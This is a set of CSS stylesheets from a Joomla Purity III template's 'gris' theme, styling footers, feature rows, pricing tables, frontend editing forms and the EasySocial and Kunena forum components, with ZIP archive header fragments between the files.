}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-left: 0;
  margin-bottom: 0;
  padding-left: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  right: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  content: " ";
  display: table;
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  content: " ";
  display: table;
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: right;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #454444;
  color: #c4c4c4;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #c4c4c4;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #2b2b2b;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  left: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  left: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-right: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: left;
  font-weight: bold;
  padding-left: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-right: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-left: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-right: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 0 0 5px rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #454444;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #454444;
  border-color: #454444;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-left: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-left: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}PKԜ�\y֦Jl+l+2purity_iii/local/css/themes/gris/frontend-edit.cssnu&1i�.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-left: 280px;
  }
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-left: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-left: 5px;
  padding-right: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  content: " ";
  display: table;
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-right: 30px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-left: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: left;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: left;
  padding: 3px 12px;
  margin-left: 5px;
}
.window #imageForm .pull-right {
  margin-right: 30px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  content: " ";
  display: table;
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: left;
  margin-right: 10px;
  margin-left: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-right: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  left: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: right;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  left: 100%;
}
.t3onoff label.off.active:before {
  left: 0%;
}
.t3onoff label.on:before {
  background: #690;
  left: -100%;
}
.t3onoff label.on.active:before {
  left: -0%;
}
.t3onoff label.off:after {
  left: 60%;
}
.t3onoff label.off.active:after {
  left: 0%;
}
.t3onoff label.on:after {
  left: 0%;
}
.t3onoff label.on.active:after {
  left: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-right-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-right-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn {
  border-left: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: left;
}
.button2-right,
.button2-right div {
  float: right;
}
.button2-left {
  margin: 5px 5px 0 0;
}
.button2-right {
  margin: 5px 0 0 5px;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: left;
  padding: 2px 10px;
  border-radius: 0px;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-left: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-left: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-right: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}PKԜ�\=[����:purity_iii/local/css/themes/gris/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-left: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKԜ�\ETu.�h�h6purity_iii/local/css/themes/gris/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #454444;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-right: 3px;
  margin-left: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #454444;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #454444;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-right: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #454444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #454444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-right: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #454444;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-right: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
